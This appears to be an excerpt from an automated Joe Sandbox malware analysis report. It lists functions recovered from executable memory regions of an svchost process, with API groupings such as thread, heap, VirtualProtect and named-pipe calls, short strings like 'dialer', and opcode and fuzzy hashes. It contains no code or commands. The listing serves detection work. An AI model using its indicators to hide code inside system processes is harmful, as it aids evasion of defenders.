                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$Context
                                                    • String ID:
                                                    • API String ID: 1666949209-0
                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction ID: 60ab21630707aac3798ecf9166792788bd74f2907c85a2321cc20bfd57c17da0
                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                    • Instruction Fuzzy Hash: CFD17B7A259F48D1DA70DB16E89439A77A0F3CCB85F200116EA8D5BBA5DF38C552CF40
                                                    Function 00000158709D2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID: dialer
                                                    • API String ID: 756756679-3528709123
                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction ID: e6d8faa326a562ef7d00f18873055ee8b9534239608773783dd45c2c1394fe41
                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                    • Instruction Fuzzy Hash: FE31923A709F59C2E615CF16ED407E977A0FB98B82F1884249E485BB56EF34C462CB00
                                                    Function 00000158709DCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction ID: aa873455afc96999b87c21931bd58146887484eb7e08ab61906587a09483081b
                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                    • Instruction Fuzzy Hash: EA116379389E48C1FA6457259E553E931425BCC7F6F344714A8366F7DBDD28C4438E40
                                                    Function 00000158709D199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 517849248-0
                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction ID: 7cc37782291b92a2b75e31e5930a5bab2ef7aa798e5d7ec79eb9ff034366abf0
                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                    • Instruction Fuzzy Hash: 2F016D36304E44C2EB54DB62A84839973A1F78CBC2FA84035DE4967765DF3CC99ACB00
                                                    Function 00000158709D36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                    • String ID:
                                                    • API String ID: 449555515-0
                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction ID: d92c0bde52101c03c87867e95d8acc90603132017f221265b0eb273a598ab5d0
                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                    • Instruction Fuzzy Hash: 3B011B7A215F44C2FB249B22EC0839973A0BB9DB87F244428CD492B765EF3DC51A8B00
                                                    Function 00000158709D9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 04aa9ae47b2a9c131ca64884b0331827bb0d1dcec54a8120c3393878895a1e76
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: CE51C63A74DA06CADB14EF15EC48B993795F389B9AF218124DA076B74ADF75CC42CB00
                                                    Function 00000158709D8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: cc6c5033e38e6afa751b52c8de9f6da4c93002e611e71df0da7fecd0cba56087
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 0F31C43A348A44D6E714EF11EC447993765F388BCAF258114EE4A2B746DF39C942CF04
                                                    Function 00000158709D1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FinalHandleNamePathlstrlen
                                                    • String ID: \\?\
                                                    • API String ID: 2719912262-4282027825
                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction ID: 698509cad8b23d240c0b825ecc2b97b4a5749d1b6b2534689e1e69f203ffbdc3
                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                    • Instruction Fuzzy Hash: 77F03C37704A45D2EB608B61FC847997760F78CBDAFA44020DA495AA65DE2CCA9ECF00
                                                    Function 00000158709D3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CombinePath
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3422762182-91387939
                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction ID: de2cf2f2a9d9284385138a2729b234b0e2eb91eb51179958fd2d97b66a3f2f3e
                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                    • Instruction Fuzzy Hash: 8EF05439204F84C1EA104B12BD042997260A78CFD2F289120DD461BB29DE28C8568B00
                                                    Function 00000158709DBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction ID: 10d4d02c46d8948fd3dba8b0568bcad9390f76deb3f3d4399e5b44582f6e7a45
                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                    • Instruction Fuzzy Hash: C0F0627A215E04D1EB148B29EC443997320FBCDBA7F640219CA6A5D2F4CF2CC956CB00
                                                    Function 00000158709D50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction ID: d8e4fcef7782aab0e6196fa45eef77e5817cd3fcfaeadc4be3155837d2d64916
                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                    • Instruction Fuzzy Hash: EF02A83625DB84C6E760CB55E89039AB7A1F3C8795F204015EA8E9BBA9DF7CC495CF00
                                                    Function 00000158709D5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction ID: 2d239d733d9f377039aa2bd8920474b359dab336e32e40763e3e9fde822d2307
                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                    • Instruction Fuzzy Hash: 4961C73A559E48C6E760CB15E85435AB7A0F3CC786F600116EA8E5BBA9DF7CC452CF40
                                                    Function 00000158709B3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: b22d272b1eca59d2f8be55dc33f3d675a4ea0f3ee1479b912bd1a7d695708eec
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: C411C47A610E01D1FA749568EC513E934806BDC37EF78C728BD6ABEED78EA4C8474900
                                                    Function 00000158709E4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction ID: 45fce9a1b44715b5da1f110af4fbf2b5e72d243b065df00d6a6cb7d411a89504
                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                    • Instruction Fuzzy Hash: F011B23BA18F40E1FE645578DC553E531416BFC3A6E380624A5766E6F6CEA8CCA34901
                                                    Function 00000158709AF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                    • API String ID: 3215553584-4202648911
                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction ID: bfa070ed68fe50ba7f1f2c297ac04698a413684fc1faf6f2fb695e8f31954a37
                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                    • Instruction Fuzzy Hash: 2A6192BE60CE00C2FA658BA4DC603EA7A90E7CD792F714516CA153F795EE34C847EA00
                                                    Function 00000158709DAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 7893eb5ab0e642a1a0fa3d649198329584f3167fee0553330bce6cb7a40f68a6
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: 06614C3A605A48CAEB109F65D8403DD77A1F388B99F244216DE492BB95DF38D556CB00
                                                    Function 00000158709AA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: ad2e3dc20faeaab019d23fdd26e7ac47928873f210296601eed610e87e364d0a
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: C051D1BA108A80CBEF648B15984439877A0F3DCB96F284116DA596BBC5CF39D462EF40
                                                    Function 00000158709DAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction ID: c55e6b89f1deeede7607d44a4678232a21c5566193418bc64356b270fa1dde39
                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                    • Instruction Fuzzy Hash: 8A51B57A148B88CAEB748F25D9443D977A0F3D8B96F244115DA496BBD6CF34C462CF00
                                                    Function 00000158709A8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction ID: 522bc94808ccd0891ba8f4ee668879e4334006ea7c9bfdc7b7a578e3ad5792e1
                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                    • Instruction Fuzzy Hash: 4F51E7BAB15A00CAD754CF15D808B9AB395F3C8B99F609064EE066B748EF34CC42DF04
                                                    Function 00000158709A83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 3242871069-629598281
                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction ID: 425ae51dfe7bd6ea10f93c1d87e22065c9b592431508976835fcf9b4f7ab9431
                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                    • Instruction Fuzzy Hash: 1131D1B9615B40DAE710DF11EC4879AB7A4F3C8B9AF258014EE4A6B794DF38C942DB04
                                                    Function 00000158709E2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction ID: 30429b6e85d52d015e3732def11cd14d4559421b5eb639c62a2224f3fa9bfba5
                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                    • Instruction Fuzzy Hash: 66D1CF77714A80C9E711CF65D8403DC3BA1F398799F24421ADE59ABBA9EE34C927CB40
                                                    Function 00000158709D14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free
                                                    • String ID:
                                                    • API String ID: 3168794593-0
                                                    • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction ID: 6c2322820e03c340fe85ce000d17cb2736a86ce4299153c466e268a4634f297b
                                                    • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                    • Instruction Fuzzy Hash: CF014C3B608E94D6D705DF66ED0428A77A1F78CFC2F144429EA4967729DE38C462CB40
                                                    Function 00000158709E2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleErrorLastMode
                                                    • String ID:
                                                    • API String ID: 953036326-0
                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction ID: 9698fe35d1373322723ac282d06d8dd41e13e0f968837ab8ea655e484caeaefb
                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                    • Instruction Fuzzy Hash: 45918E7B610A54C5F7609F65DC403ED3BA0B789B8AF38411DDE4A7B6A5DE34C8A38B00
                                                    Function 00000158709D7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                    • String ID:
                                                    • API String ID: 2933794660-0
                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction ID: d83516dcc5bf840c11a0c3c522cc2f90a05092959f30cd3160fc22130dc72981
                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                    • Instruction Fuzzy Hash: A9115A3A714F00CAEB00CF60EC543A833A4F79D769F540E21EA6D5A7A4DF78D5A98780
                                                    Function 00000158709D253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction ID: f47752b0ae6f6901657473cb0ccd733c6e7a9ca02a6f2b5df069b7bf189e1af2
                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                    • Instruction Fuzzy Hash: C571C23A248F89C6E7349E25DC443EA7794F3DDB86F640026DD496BB8ADE35C646CB00
                                                    Function 00000158709A9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CallTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3163161869-2084237596
                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction ID: 489574c67d8b5b6cc54a2877ae297f4e8f41fd0bb560a578f5265c3132118aee
                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                    • Instruction Fuzzy Hash: 3761497A608B44CAEB20DF65D8403DD77A0F388B89F244215EF492BB99DF38D556DB40
                                                    Function 00000158709D2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID: \\.\pipe\
                                                    • API String ID: 3081899298-91387939
                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction ID: babde32fb5154fc8530fc586cff3b7450ac821e147294971176bd01e01761f2d
                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                    • Instruction Fuzzy Hash: B051E63A24CB89C1E6359B29E8583EA7751F3ED782F640125DD492BB6BCE39C5068F40
                                                    Function 00000158709E26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction ID: 21ff62e2b89e22826b140db66bb7822c727ad4cd8fe966186e5f0310e84707f2
                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                    • Instruction Fuzzy Hash: 8841A037219A80C2DB208F25E8443EAB7A0F79C795F644025EE4D9B798EF3CC952CB40
                                                    Function 00000158709D94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
